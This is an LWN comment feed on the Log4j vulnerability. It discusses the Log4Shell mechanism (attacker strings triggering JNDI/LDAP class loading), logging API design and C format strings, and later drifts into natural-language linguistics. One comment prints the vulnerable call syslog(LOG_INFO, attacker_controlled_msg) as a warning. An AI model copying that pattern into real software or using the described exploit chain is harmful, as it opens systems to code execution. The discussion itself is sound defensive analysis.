LWN: Comments on "The Log4j mess" https://lwn.net/Articles/878390/ This is a special feed containing comments posted to the individual LWN article titled "The Log4j mess". Thu, 16 Oct 2025 09:06:27 +0000 The Log4j mess https://lwn.net/Articles/881441/ https://lwn.net/Articles/881441/ mathstuf <div class="FormattedComment"> <font class="QuotedText">&gt; I pronounce it Jillingham, which is the grammatically correct way? The i softens the g?</font><br> <p> I don&#x27;t think that&#x27;s a hard and fast rule. Take &quot;gill&quot; (as in fish breathing organs) for example. I&#x27;m American, but I&#x27;d pronounce that with a hard &quot;g&quot; without any other guidance.<br> </div> Sat, 15 Jan 2022 01:45:23 +0000 The Log4j mess https://lwn.net/Articles/881433/ https://lwn.net/Articles/881433/ Wol <div class="FormattedComment"> That&#x27;s fine until you get conflicting rules in different dialects. I&#x27;ve just got used to it ...<br> <p> And then you get wonders like &quot;how do you pronounce Gillingham?&quot; Where the correct answer is &quot;What county are you in?&quot;. I pronounce it Jillingham, which is the grammatically correct way? The i softens the g? The way of the Men of Kent? (No, Kentish Men don&#x27;t live in Gillingham.)<br> <p> And then I went to Somerset, where they pronounce it G&#x27;illingham, like Google Maps. Very confusing :-)<br> <p> My daughter&#x27;s now a Yorkshire lass with Geordie in-laws. That gets well weird ...<br> <p> Give up. 
English is a STRANGE language (and that&#x27;s *before* the Americans started messing with it :-)<br> <p> Cheers,<br> Wol<br> </div> Fri, 14 Jan 2022 21:40:06 +0000 The Log4j mess https://lwn.net/Articles/881421/ https://lwn.net/Articles/881421/ mathstuf <div class="FormattedComment"> <font class="QuotedText">&gt; Bear in mind languages re-program the brain.</font><br> <p> I don&#x27;t believe the Sapir-Whorf hypothesis has been proven enough to state it with such conviction. At least this sounds like the strong version (whereas the weaker version where it merely *influences* is much better supported).<br> <p> <font class="QuotedText">&gt; Someone else has already mentioned tonal languages.</font><br> <p> English has tones. Not in the same way as Chinese or Telugu, but it&#x27;s there. Just as an example, verbal sarcasm is (usually) expressed through tonality. Take &quot;yeah, right&quot; (agreement) and &quot;yeah…right&quot; (doubt) when said verbally. The only difference is tone and timing. English also has tones associated with questions and interrogatory statements (try asking questions flatly or adding a rising tone to the end of sentences). The tonality is more on the level of sentences rather than on syllables, but I don&#x27;t think anyone can say with conviction that English is completely atonal and therefore is not something completely alien to English speakers. It&#x27;s just used differently (with a higher level of importance).<br> <p> FWIW, Hindi has aspiration on basically every consonant sound which makes it different (and therefore changes the word). It is *very* hard for me to make some of them as it just doesn&#x27;t feel natural and I feel like I&#x27;m making a separate &quot;h&quot; sound, but I (think I) am getting better at hearing them. I suspect it is similar for the English l/r distinction that is difficult for native speakers of some languages. Rolling or trilling r sounds is also something I have just not been able to master either. 
Tones in other languages feel more like this to me than something impossible.<br> </div> Fri, 14 Jan 2022 17:24:07 +0000 The Log4j mess https://lwn.net/Articles/881418/ https://lwn.net/Articles/881418/ nix <div class="FormattedComment"> <font class="QuotedText">&gt; But even just French and English - French has a bunch of rules about where and how to stress the syllables. English doesn&#x27;t.</font><br> <p> Yes it does. It just has different rules (it&#x27;s incredibly hard to understand mis-stressed English and sometimes it can be incomprehensible or change the meaning entirely, just as in French). What English has mostly lost is the need for endings of, well, almost anything but pronouns to agree in number, case etc (an ancient feature present in almost all other PIE-descended languages).<br> </div> Fri, 14 Jan 2022 16:48:45 +0000 The Log4j mess https://lwn.net/Articles/881413/ https://lwn.net/Articles/881413/ Wol <div class="FormattedComment"> Bear in mind languages re-program the brain. Someone else has already mentioned tonal languages.<br> <p> But even just French and English - French has a bunch of rules about where and how to stress the syllables. English doesn&#x27;t. So as an English speaker when somebody talks to me with a different stress pattern I take it in my stride. But if I spoke French with an English stress pattern, a Frenchman would find it much harder to understand than if I spoke with a French stress pattern, despite being the EXACT SAME syllables (or rather not, as consonants migrate freely between English syllables).<br> <p> If your brain is programmed to recognise one class of languages, it is very difficult to be competent in a different class. 
And even multi-lingual kids - a study of children with one French and one English parent found that all the kids fell on one side or the other of this divide, and it clearly affected their choice of favourite language, even if they were perfect in the other.<br> <p> Cheers,<br> Wol<br> </div> Fri, 14 Jan 2022 16:36:33 +0000 The Log4j mess https://lwn.net/Articles/881411/ https://lwn.net/Articles/881411/ nix <div class="FormattedComment"> <font class="QuotedText">&gt; In short, if you can write well using computer languages, you should be able to learn to write well using English (as most programming languages use English) and your native language if it is not English, and you should be able to learn another natural language without too much difficulty</font><br> <p> Oh yes, because natural languages and computer languages have exactly the same level of complexity. Oh wait no, natural languages are orders of magnitude more complex and vary along many more dimensions, with much less obvious internal coherence (the only actual rule is &quot;must be an attractor in the space of languages instantiated by the learning systems in toddlers&#x27; heads when iterated for many generations&quot;, and nobody even knows how those incredible pieces of neural machinery work or what they do, or even the space of languages they could in theory produce or the dimensions along which those languages might vary). This couldn&#x27;t be more different from how computer languages are designed. Really, most computer languages are so similar to each other (compared to the variability we see in natural languages) that it would be close to the truth to call them all very strange, restricted dialects of (mostly) English.<br> <p> Everyone who is neurologically normal can learn at least one spoken language in the critical window in childhood. 
Not everyone can learn more outside that time, no matter how hard they try, and even those who do are very rarely as good at it as native speakers who learned in that window. And computer languages are textual, and that&#x27;s not a language at all: it&#x27;s a technological *encoding* of a language. Languages are spoken things (or, for the deaf, serially-visually-encoded things quite unlike any form of writing, processed using astonishingly similar machinery to the machinery used to process auditory language, often ending up using the exact same brain regions, repurposed bits of auditory cortex!). There is no spoken form of any computer language I am aware of: IMHO this alone is enough to disqualify them all as being remotely similar to natural languages.<br> </div> Fri, 14 Jan 2022 16:18:26 +0000 The Log4j mess https://lwn.net/Articles/880213/ https://lwn.net/Articles/880213/ immibis <div class="FormattedComment"> It&#x27;s C. What kind of value is format going to return?<br> </div> Mon, 03 Jan 2022 12:24:24 +0000 The Log4j mess https://lwn.net/Articles/879252/ https://lwn.net/Articles/879252/ jezuch <div class="FormattedComment"> In short: performance. 
You don&#x27;t want to pay the price of formatting the message if it isn&#x27;t going to be used because (for example) the log is of too low priority (generally you want to have lots of DEBUG logs which are turned off by default - making this cheap is important) (making it convenient is also important - you could check each time if the log level is enabled, but it&#x27;s extremely annoying and ugly as hell)<br> <p> So in effect the modern logging frameworks take the format string and arguments instead of a pre-formatted message, and some static analysis tool will scream at you if you don&#x27;t use them.<br> </div> Mon, 20 Dec 2021 17:50:21 +0000 The Log4j mess https://lwn.net/Articles/879046/ https://lwn.net/Articles/879046/ ianmcc <div class="FormattedComment"> Why do interpolation at the same time as writing to the log? Wouldn&#x27;t it be more sensible to separate out those tasks and if you want interpolation then spell it like syslog(LOG_INFO, format(&quot;%s&quot;, attacker_controlled_msg)) ? (Yes, it&#x27;s too late for syslog(3), but in new code...)<br> </div> Fri, 17 Dec 2021 16:55:41 +0000 The Log4j mess https://lwn.net/Articles/878907/ https://lwn.net/Articles/878907/ khim <p>Similarity between programming languages and natural languages is quite real but irrelevant.</p> <p>“Programming” humans and programming computers are two radically different skill sets. That's why good managers are rarely good programmers and good programmers are rarely good managers.</p> <p>The difference lies not in the languages used, but in the difference between computers and humans. And <b>that</b> one is huge.</p> <p>Humans have common sense yet can't keep even a dozen entities in mind simultaneously. Computers have no common sense but can easily deal with millions and billions of entities.</p> <p>This makes the art of making a computer do what you need radically different from doing the same with a human. 
With a computer there is no need to persuade anyone to do anything or keep anyone engaged or interested, but you have to handle corner cases or else you will be in trouble. With humans you can rely on the fact that most corner cases will be noticed and fixed automatically, but you need to somehow convince someone to accept your “program”.</p> <p>Consider lawyers (who are, arguably, closest to “human programmers”) vs programmers. What would a programmer do when faced with the need to verify a program? Test corner cases first. If the program works fine there, then chances are high it will work fine everywhere. What does a lawyer do when faced with the need to interpret the law? Tries to move as far from corner cases as possible: you can never be sure how a judge would interpret corner cases, thus spending time on them is pointless; better to look for a way to resolve the case <b>without</b> touching any corner cases, even remotely.</p> <p>And trying to use human languages like a programming language (following the <a href="https://en.wikipedia.org/wiki/Don%27t_repeat_yourself">DRY principle</a>, trying to avoid text duplication, and so on) is the best way to create something which no one, not even another programmer, would be able to understand.</p> <p>Because with computers you try to avoid duplication but for human-readable text it's important to do just the opposite: talk about the same thing from many different approaches in the hope that the reader would be able to understand and accept at least one of them.</p> Thu, 16 Dec 2021 19:11:30 +0000 The Log4j mess https://lwn.net/Articles/878904/ https://lwn.net/Articles/878904/ fest3er <div class="FormattedComment"> Alas, coders, programmers and software engineers will never produce quality documentation until teachers/instructors/professors learn to teach natural languages (English, Korean, Chinese, Russian, Italian, Bantu, et alia) as *programming* languages. Because that is what they are. 
Consider: as I type this response, I am attempting to code a program that, when you later read it, will program *your* neural nets to think what I am thinking.<br> <p> I see little reason for any software engineer to be unable to code good, clear documentation. Programming is programming; natural languages and computer languages all demand rigorous attention to details in order to avoid errors. In short, if you can write well using computer languages, you should be able to learn to write well using English (as most programming languages use English) and your native language if it is not English, and you should be able to learn another natural language without too much difficulty.<br> <p> All languages are programming languages and should be taught as such. But I digress.<br> </div> Thu, 16 Dec 2021 18:49:50 +0000 Apache Log4j https://lwn.net/Articles/878814/ https://lwn.net/Articles/878814/ nim-nim <div class="FormattedComment"> It’s not a problem in the Open Source part, it’s a generic problem in *Enterprise* software.<br> <p> In *Enterprise* software the interactions between participants are mediated by contracts and licenses that effectively prevent fixing software the natural way. Thus the main “feature” of Enterprise software is inventing setups that allow executing new code without invoking past contracts.<br> <p> As the commit that added the problematic feature to Log4j states, it’s for the “convenience” of not changing things where they belong, stupid.<br> <p> Java and the Apache foundation (that is mostly Enterprise-oriented Java software, despite using a non-Java software front) were the poster child of this kind of development process. They were and are deeply hostile to free software because you just don’t fix things upstream, you find ways to work around locally using things like JNDI or its modern equivalents. 
Of course they’ve lost a lot of their shine in the past years now that someone needs to process the accrued technical debt (besides, the inefficiencies crushed the ecosystem, with a single remaining vendor for Hadoop &amp; friends).<br> <p> And if you think non-Open-Source Java development is any different than the one you see Apache foundation side I have prime real estate on the moon to sell you.<br> <p> (the static linking/containerish guys are mostly the same crowd using new languages to make the same mistakes, in a decade or so they’ll be all over CERT bulletins fixing the technical debt they’re busy creating right now).<br> <p> </div> Thu, 16 Dec 2021 09:07:54 +0000 The Log4j mess https://lwn.net/Articles/878776/ https://lwn.net/Articles/878776/ NYKevin <div class="FormattedComment"> Note that vfprintf() takes a va_list, not an array. You cannot dynamically allocate and initialize va_list objects (at least, using standard portable C, anyway), so even vfprintf() does not actually support this use case in a reasonable fashion (because there would be no way to dynamically determine the arity at runtime). As I briefly alluded to, you can use va_arg (not va_copy, although that does preserve the truncation) to shorten a va_list by truncating elements from left to right, which in theory could be used to build a va_list of fixed (statically determined) types and with a static maximum arity, but that&#x27;s not really adequate for the general case. This is what I mean by &quot;C variadics are terrible.&quot;<br> </div> Wed, 15 Dec 2021 20:09:52 +0000 The Log4j mess https://lwn.net/Articles/878754/ https://lwn.net/Articles/878754/ dskoll <p>I don't think the third case is worth supporting for a logger, but if someone wants to, then the logical name would be <tt>vsyslogf()</tt>, analogous to <tt>vfprintf()</tt>. 
<p>My point is that the name <tt>syslog</tt> doesn't alert a programmer to the fact that the function takes printf-like format strings, whereas <tt>syslogf</tt> is more likely to. Wed, 15 Dec 2021 17:43:10 +0000 The Log4j mess https://lwn.net/Articles/878709/ https://lwn.net/Articles/878709/ smurf <div class="FormattedComment"> which is why I only use Ubiquiti hardware which can be (and in fact is, five minutes after unboxing) reflashed to run OpenWRT.<br> </div> Wed, 15 Dec 2021 09:05:21 +0000 The Log4j mess https://lwn.net/Articles/878695/ https://lwn.net/Articles/878695/ NYKevin <div class="FormattedComment"> I would go further. IMHO there are basically two cases:<br> <p> 1. You need interpolation. Then there should actually be at least one string interpolation command somewhere in the format string, and so you need at least two arguments (the format string and whatever argument the first interpolation takes).<br> 2. You don&#x27;t need interpolation. Then you should either be writing printf(&quot;%s&quot;, x) (or whatever printf-like function you&#x27;re calling instead of printf), or you should be using a convenience wrapper that does that for you. Therefore, you *still* need at least two arguments to printf.<br> <p> If those two cases were the only two cases that we cared about, then we could just ban one-argument printf (and printf-likes) altogether (e.g. using a lint rule).<br> <p> Unfortunately, there&#x27;s a third case:<br> <p> 3. You are dynamically building a format string which may or may not actually contain any interpolation commands.<br> <p> You could keep track of whether you&#x27;ve added an interpolation as you build the string, and then select case (1) or case (2) at runtime. 
On first blush, this looks like needless and pedantic bookkeeping, but as it turns out, C variadics are so bad that you already have to do that anyway (or something just as verbose and ugly, involving a partial va_copy of an existing va_list, such that the copy can dynamically be empty or non-empty). So case (3) basically doesn&#x27;t exist, unless you are working in an environment or language where variadics are not C-like, at which point you can probably do runtime checking of whether the number of arguments passed matches up with the number implied by the format string.<br> <p> The only exception to this would be if your API takes a format string and a C array, but no size argument. Such APIs have never been typical for printf-like functions, because the caller would have to allocate and initialize an array, take pointers to all of the arguments, cast everything into pointer-to-void, etc. and nobody wants to do that just to print a string. So I&#x27;m perfectly happy to declare that case as &quot;You made the weird API, now you get to live with its shortcomings.&quot;<br> </div> Tue, 14 Dec 2021 23:43:34 +0000 The Log4j mess https://lwn.net/Articles/878677/ https://lwn.net/Articles/878677/ nix <div class="FormattedComment"> Original UAP. Four bricking incidents in the last two years, all thank god recoverable via TFTP. Three incidents of major functionality breakage like completely fubaring broadcasts. Not one fix reported in the horrible excuse for changelogs they emit these days. I don&#x27;t upgrade the firmware any more, and since two controller updates led to UAPs that were no longer adoptable I don&#x27;t upgrade the controller any more either.<br> <p> Ubiquiti has *really* gone downhill -- and that&#x27;s before we discovered that the head of cloud there was an extortionist who got his position by basically lying nonstop to the (apparently clueless) CEO and terrifying him and who then proceeded to try to extort money out of his employer and possibly (? 
it remains unclear) actually was the source of a credentials compromise: he was also said to be so unpleasant to work with that he was a major reason why most of the competent developers Ubiquiti employed reportedly left, leaving their software development in a seriously parlous state.<br> <p> Ubiquiti have been very hot on trying to do absolutely all their admin via cloudy stuff, which was extremely questionable in any case for *networking* gear, i.e. the stuff which needs to be properly configured if you&#x27;re to get to the cloud in the first place -- but now that it turns out that the head cloudy guy was *this* sort of person, one wonders if the whole thing was encouraged in the first place specifically to get lots of juicy credentials from lots of people.<br> </div> Tue, 14 Dec 2021 21:12:02 +0000 The Log4j mess https://lwn.net/Articles/878608/ https://lwn.net/Articles/878608/ khim <p>Various estimates put the number of software engineers in the US <a href="https://www.daxx.com/blog/development-trends/number-software-developers-world">somewhere between 2 million and 4 million</a>.</p> <p>That's around 1% of the population. Which means that the 5% which may grasp the required knowledge naturally is, probably, enough: if ¼ or ⅕ of them picked software engineering as their life goal we would have about 1% of the population. But if we take 5% of that 5% (by adding the requirement to be proficient in another, significantly different area) then we arrive at around 0.25%, which is significantly lower than 1%. 
And some of them may want to do something other than programming, you know.</p> <p>IOW: there is no excuse for the bazillions of Java programmers who copy-paste code from StackOverflow without understanding what they are doing, but asking the programmers to learn to write good literature on top of writing good code would be too much.</p> <p>Maybe we could organize things differently and then 0.05% of the population would be enough… but that would require an entirely different organization of society and we have no idea if such a society is possible at all.</p> Tue, 14 Dec 2021 15:28:33 +0000 The Log4j mess https://lwn.net/Articles/878604/ https://lwn.net/Articles/878604/ mathstuf <div class="FormattedComment"> <font class="QuotedText">&gt; Sorry, we need more than one coder per thousand (or ten thousand?) of people.</font><br> <p> Hmm. This certainly warrants a citation. If you&#x27;re referring to &quot;societal demand&quot; kind of &quot;need&quot;, sure. But I&#x27;m not sure that turns into anything other than &quot;the market will fulfill demand&quot; with the normal head-in-the-sand behaviors to externalities if there&#x27;s not some kind of guiding regulation (IMO, another &quot;societal demand&quot; kind of &quot;need&quot;).<br> </div> Tue, 14 Dec 2021 13:52:39 +0000 The Log4j mess https://lwn.net/Articles/878603/ https://lwn.net/Articles/878603/ dskoll <p>Yes, it was a real WTF of a design error. Even venerable old syslog(3) has been abused due to the naivety of programmers who write: <p><tt>&#160;&#160;&#160;syslog(LOG_INFO, attacker_controlled_msg);</tt> <p>instead of: <p><tt>&#160;&#160;&#160;syslog(LOG_INFO, "%s", attacker_controlled_msg);</tt> <p>If I could go back in time, I'd redesign syslog(3) to take only a single string argument that is logged verbatim, and add a new syslogf(3) function that implements the formatted version. 
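<p>A minimal sketch of the verbatim/formatted split described above, under stated assumptions: the names <tt>render_verbatim</tt> and <tt>render_formatted</tt> are hypothetical and are not part of any libc. They write into a caller-supplied buffer rather than calling syslog(3), so the behaviour can be checked without a running log daemon; a real wrapper would presumably hand the finished buffer to <tt>syslog(priority, "%s", buf)</tt>.

```c
#include <assert.h>
#include <stdarg.h>
#include <stdio.h>

/*
 * Hypothetical "verbatim" variant: msg is treated purely as data.
 * Any '%' sequences it contains are copied through unchanged because
 * the only format string involved is the constant "%s".
 * Returns the length snprintf() reports for the full message.
 */
int render_verbatim(char *out, size_t cap, const char *msg)
{
    assert(out != NULL && cap > 0);
    return snprintf(out, cap, "%s", msg);
}

/*
 * Hypothetical "formatted" variant: the trailing 'f' in a name such as
 * syslogf() would signal that the second-to-last fixed argument is a
 * printf-style format string, which should never come from an attacker.
 */
int render_formatted(char *out, size_t cap, const char *fmt, ...)
{
    va_list ap;
    int n;

    assert(out != NULL && cap > 0);
    va_start(ap, fmt);
    n = vsnprintf(out, cap, fmt, ap);
    va_end(ap);
    return n;
}
```

<p>With this split, passing hostile input such as <tt>"%s%n"</tt> to the verbatim function is harmless, and the formatting behaviour is only available under a name that advertises it.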
Tue, 14 Dec 2021 13:52:31 +0000 The Log4j mess https://lwn.net/Articles/878600/ https://lwn.net/Articles/878600/ khim <font class="QuotedText">&gt; Maybe Knuth had a point with his whole “literate programming” thing after all :)</font> <p>Wouldn't work. It's slow, but, more importantly, for it to work you need someone who can write good code <b>and</b> good documentation.</p> <p>It's hard enough to find someone who can do a good job at one of these things. But to find someone who can do these two different things? Simultaneously?</p> <p>Sorry, we need more than one coder per thousand (or ten thousand?) of people.</p> Tue, 14 Dec 2021 13:23:40 +0000 The Log4j mess https://lwn.net/Articles/878599/ https://lwn.net/Articles/878599/ nye <div class="FormattedComment"> What devices do you use where this has been a problem? For me, the only issue I&#x27;ve ever had with updating the controller and firmware was when I had to switch my inform URL to non-HTTPS temporarily, to get out of a circular problem where I couldn&#x27;t update my USG firmware to a version that would support the new style letsencrypt certificates. Other than that, it&#x27;s been bulletproof for me.<br> <p> I&#x27;m using a USG and some UAC-AC-PROs, so I&#x27;m interested in seeing what hardware I should avoid buying in the future!<br> </div> Tue, 14 Dec 2021 12:48:14 +0000 Apache Log4j https://lwn.net/Articles/878596/ https://lwn.net/Articles/878596/ smurf <div class="FormattedComment"> <font class="QuotedText">&gt; including Responsible Oversight which ensures problems like this don&#x27;t happen</font><br> <p> Excuse me while I fall off my chair, laughing madly.<br> <p> This would be slightly more believable if a wet fart of the money the Apache Foundation rakes in every year actually went to the people responsible for maintaining all that software under its umbrella. 
Particularly when it&#x27;s a central piece of infrastructure.<br> <p> Well … apparently it was not possible to learn anything from the openssl mess. So we have to repeat it. (Only worse.)<br> <p> </div> Tue, 14 Dec 2021 10:19:56 +0000 The Log4j mess https://lwn.net/Articles/878595/ https://lwn.net/Articles/878595/ smurf <div class="FormattedComment"> <font class="QuotedText">&gt; Sure, but the client could do that themselves.</font><br> <p> But that would … umm … require actual coding?<br> <p> Given that Java devolved into a language of which 90% (personal and admittedly biased impression) consists of mostly-copied-from-stackoverflow boilerplate for iterator classes and instance-building classes and whatnot *plus* its own built-in scripting language (it&#x27;s too difficult to hook anything sane into the JVM, so …), most Java coders won&#x27;t be able to get that right.<br> <p> So instead of a sane approach, which would have required an entirely new heap of class scaffolding just for the ability to pass a look-something-up object to the logger, they opted to do string interpolation. Of random data from outside. Patently stupid but let&#x27;s face it the first step towards a _really_ sane solution involves &quot;use a sensible language dammit&quot;.<br> </div> Tue, 14 Dec 2021 10:11:54 +0000 Apache Log4j https://lwn.net/Articles/878594/ https://lwn.net/Articles/878594/ taladar <div class="FormattedComment"> I think the problem is largely that Java Open Source projects and Enterprise Open Source projects in general are often the result of unbearable pain at some employer that people then fix by writing some library in their free time because their employer is too cheap to do it properly on the clock. Obviously that same Enterprise employer is then also too cheap to pay for maintenance of the code. 
At some point the good programmer leaves the bad employer and has no need for the code any more so it goes unmaintained, especially for boring solutions to boring problems written in boring languages.<br> </div> Tue, 14 Dec 2021 09:35:34 +0000 The Log4j mess https://lwn.net/Articles/878587/ https://lwn.net/Articles/878587/ Cyberax <div class="FormattedComment"> <font class="QuotedText">&gt; 2. Log4j uses some JNDI and LDAP magic to convert this URI into a Class&lt;T&gt; object, or something which at least vaguely resembles a Class&lt;T&gt; object. In so doing, it downloads the class definition from an attacker-controlled server.</font><br> <p> Close. LDAP in Java has support for class loading, which was earlier (in the time of Java 1.2!) used to load type information data for things like custom exceptions or custom types. Doc: <a href="https://docs.oracle.com/en/middleware/idm/internet-directory/12.2.1.4/development/oracle/ldap/util/LDAPClassLoader.html">https://docs.oracle.com/en/middleware/idm/internet-direct...</a><br> <p> LDAP is not the only vector that can be used to exploit this. RMI (Remote Method Invocation) is just as potent but is a bit harder to set up.<br> <p> <font class="QuotedText">&gt; 3. Log4j then uses reflection to call some method on that Class&lt;T&gt; (or whatever it is), which causes attacker-controlled code to be executed.</font><br> It actually doesn&#x27;t use it for anything, but simply loading the class is enough (static initializers can run arbitrary code).<br> <p> </div> Tue, 14 Dec 2021 08:26:36 +0000 The Log4j mess https://lwn.net/Articles/878586/ https://lwn.net/Articles/878586/ NYKevin <div class="FormattedComment"> <font class="QuotedText">&gt; There&#x27;s no arbitrary lookup at runtime.</font><br> <p> To my understanding, the way this CVE has been publicly described is (roughly) as follows:<br> <p> 0. A vulnerable implementation logs a user-provided string.<br> 1. The string contains a URI.<br> 2. 
Log4j uses some JNDI and LDAP magic to convert this URI into a Class&lt;T&gt; object, or something which at least vaguely resembles a Class&lt;T&gt; object. In so doing, it downloads the class definition from an attacker-controlled server.<br> 3. Log4j then uses reflection to call some method on that Class&lt;T&gt; (or whatever it is), which causes attacker-controlled code to be executed.<br> <p> I call step (2) &quot;arbitrary class lookups at runtime.&quot; What do you call it, or is my understanding of this security vulnerability completely incorrect?<br> </div> Tue, 14 Dec 2021 08:12:46 +0000 The Log4j mess https://lwn.net/Articles/878583/ https://lwn.net/Articles/878583/ rodgerd <div class="FormattedComment"> Time to bust this baby out again: <a rel="nofollow" href="https://www.youtube.com/watch?v=kjZHjvrAS74">https://www.youtube.com/watch?v=kjZHjvrAS74</a><br> </div> Tue, 14 Dec 2021 03:27:17 +0000 The Log4j mess https://lwn.net/Articles/878571/ https://lwn.net/Articles/878571/ sjj <div class="FormattedComment"> I&#x27;ve used this as the first code line.<br> <p> set -efu -o pipefail<br> </div> Mon, 13 Dec 2021 23:24:56 +0000 The Log4j mess https://lwn.net/Articles/878572/ https://lwn.net/Articles/878572/ camhusmj38 <div class="FormattedComment"> Thanks for sharing this. It was very useful<br> </div> Mon, 13 Dec 2021 23:24:07 +0000 The Log4j mess https://lwn.net/Articles/878568/ https://lwn.net/Articles/878568/ bartoc <div class="FormattedComment"> I’m a C++ library implementer, so implementing these kinds of standards is my job<br> <p> They do become clearer, I guess, but many bugs still don&#x27;t show up until you have actually gone to write the first implementation. A technical standard with zero implementations is a very different beast than one with one implementation, and that&#x27;s different from one with multiple independent implementations. 
<br> <p> There&#x27;s a reason the C++ committee likes to standardize existing libraries, and even then the resulting specification usually contains many bugs found only during implementation. <br> <p> In any event I think going to a formal standardization model would be a very expensive way to resolve this, and if nobody else is going to implement the thing then you could just as well spend the time writing documentation for the current behavior (which is what a standard with one implementation written after the fact by that implementation&#x27;s authors is going to be in any case). Improving the documentation outside any formal process is probably better bang for the buck. <br> <p> Maybe Knuth had a point with his whole “literate programming” thing after all :)<br> </div> Mon, 13 Dec 2021 22:27:02 +0000 The Log4j mess https://lwn.net/Articles/878567/ https://lwn.net/Articles/878567/ Cyberax <div class="FormattedComment"> That&#x27;s pretty much what happened. Except that the JNDI lookup code was added to the default set of plugins.<br> <p> Here&#x27;s the patch: <a href="https://issues.apache.org/jira/secure/attachment/12592850/jndi-lookup-plugin.patch">https://issues.apache.org/jira/secure/attachment/12592850...</a> - note the plugin set in the beginning.<br> <p> <font class="QuotedText">&gt; My argument here is that the vast majority of the time, you don&#x27;t actually need to do arbitrary class lookups at runtime. </font><br> <p> There&#x27;s no arbitrary lookup at runtime. E.g. you can&#x27;t do something like &quot;${nodejs:script}&quot; and expect the JVM to dynamically class-load NodeJS.<br> <p> The problem is in the JNDI implementation, it can be used to load arbitrary code. 
This is arguably a bad design in the first place, though.<br> </div> Mon, 13 Dec 2021 22:14:57 +0000 The Log4j mess https://lwn.net/Articles/878566/ https://lwn.net/Articles/878566/ khim <font class="QuotedText">&gt; when you consider that Java was originally designed to force programmers to use OOP whether they like it or not.</font> <p>This may have been <b>the original intent</b>, but Java, eventually, became a language whose true strength lies in the ability to use programmers who don't know anything about OOP or even programming in general and program by copy-pasting snippets from Stack Overflow randomly till tests pass.</p> <p>Of course when the language started adding features which are easy to abuse that fact became exposed.</p> <p>But it's not as if Java programmers understood what they are doing and why before introduction of Streams.</p> Mon, 13 Dec 2021 21:42:45 +0000 The Log4j mess https://lwn.net/Articles/878561/ https://lwn.net/Articles/878561/ NYKevin <div class="FormattedComment"> <font class="QuotedText">&gt; you don&#x27;t override XYZ</font><br> <p> s/XYZ/formatCustomReference/<br> </div> Mon, 13 Dec 2021 19:05:25 +0000 The Log4j mess https://lwn.net/Articles/878550/ https://lwn.net/Articles/878550/ NYKevin <div class="FormattedComment"> <font class="QuotedText">&gt; Second is using JNDI lookups in the format string. Format strings are typically not controlled by attackers and there&#x27;s no reason for the library author to be too concerned about supporting JNDI.</font><br> <p> Sure, but the client could do that themselves. 
For example (and I&#x27;m just making this syntax up, it could obviously be more elaborate if necessary), Log4j could say &quot;If the format string contains a substring of the form {custom:foo}, we will call the formatCustomReference() method [or whatever they decide to name it] and pass the string &#x27;foo&#x27; as the only argument, then replace {custom:foo} with whatever that method returns.&quot; Then, *if you want JNDI lookups*, you override the method with code that does a JNDI lookup (or call their convenience method/use their pre-written class which does that for you). If you don&#x27;t want JNDI lookups, you don&#x27;t override XYZ, and the default implementation either returns the string unchanged, or throws.<br> <p> My argument here is that the vast majority of the time, you don&#x27;t actually need to do arbitrary class lookups at runtime. Often, you just want some random little bit of state that happens to be inconvenient to pass directly into the logging call... so you can pull it out of some kind of context class or something like that. JNDI is basically reflection, and it should be a last resort, not the default way of solving the &quot;I need to run some code&quot; problem.<br> <p> See also: <a href="http://thecodelesscode.com/case/97">http://thecodelesscode.com/case/97</a><br> </div> Mon, 13 Dec 2021 17:23:45 +0000 The Log4j mess https://lwn.net/Articles/878522/ https://lwn.net/Articles/878522/ epa <div class="FormattedComment"> It&#x27;s a characteristic weakness of open source, community-driven projects to make everything customizable, configurable, and dynamic. And this episode shows one advantage of crusty, rule-bound standards committees. If you have to write a formal specification of the behaviour, so that a new implementation could be written to the spec, design flaws become clearer. &quot;First the following patterns in the string are expanded. 
Then the result of that expansion is taken as a new string to be expanded, using these different patterns... oh hang on...&quot;<br> </div> Mon, 13 Dec 2021 16:14:41 +0000 The Log4j mess https://lwn.net/Articles/878456/ https://lwn.net/Articles/878456/ NYKevin <div class="FormattedComment"> <font class="QuotedText">&gt; On top, I think we ought to look at the wider culture around Enterprise Java (as I understand it) that uses a lot of instantaneous point-of-use anonymous functions in the Java 8 streams modality. This means programmers are trained away from instantiating and using items outside an anonymous lambda on composed object methods, so being able to log some data might just in-line process user-/attacker-supplied input.</font><br> <p> In other words: Java (or &quot;Enterprise Java&quot; if you prefer) has successfully ship-of-Theseus&#x27;d itself into a language whose programmers don&#x27;t know OOP. That&#x27;s a startling outcome of this whole streams business, when you consider that Java was originally designed to force programmers to use OOP whether they like it or not.<br> </div> Mon, 13 Dec 2021 15:41:52 +0000 The Log4j mess https://lwn.net/Articles/878448/ https://lwn.net/Articles/878448/ nix <div class="FormattedComment"> Oh great! This means I can fix my unifi controller without being forced to upgrade it (in the last few years, every single controller or firmware update from unifi has broken something: small if you&#x27;re lucky, total-bricking if you&#x27;re not).<br> <p> The right thing to do is decommission all my unifi stuff so I can stop running this horrible controller, but I&#x27;ve been putting that off for years... 
and at least this means people can&#x27;t own my machines by just getting the controller to log something (which is amazingly easy for a remote attacker to do -- say, from outside the house).<br> </div> Mon, 13 Dec 2021 14:20:17 +0000 The Log4j mess https://lwn.net/Articles/878438/ https://lwn.net/Articles/878438/ Cyberax <div class="FormattedComment"> The problem is that the people involved hadn&#x27;t understood that connecting two seemingly unrelated features might result in a disaster.<br> <p> First, the JNDI lookup causing class loading is fine; it&#x27;s typically used in enterprise networks to connect clients to an application server (typically over a trusted network) or to do service discovery within the application environment. These days we would think about a man-in-the-middle pretending to be the app server and injecting a malicious payload, but people were not considering this back then.<br> <p> Second is using JNDI lookups in the format string. Format strings are typically not controlled by attackers and there&#x27;s no reason for the library author to be too concerned about supporting JNDI.<br> <p> And the third is using that with raw log messages.<br> <p> A typical Swiss cheese model of a disaster.<br> </div> Mon, 13 Dec 2021 11:42:10 +0000 The Log4j mess https://lwn.net/Articles/878437/ https://lwn.net/Articles/878437/ k3ninho <div class="FormattedComment"> <font class="QuotedText">&gt;[S]ome people wouldn&#x27;t even call it a design pattern because it&#x27;s &quot;too obvious.&quot;</font><br> From the test side, &#x27;obvious&#x27; is one of my trigger words. 
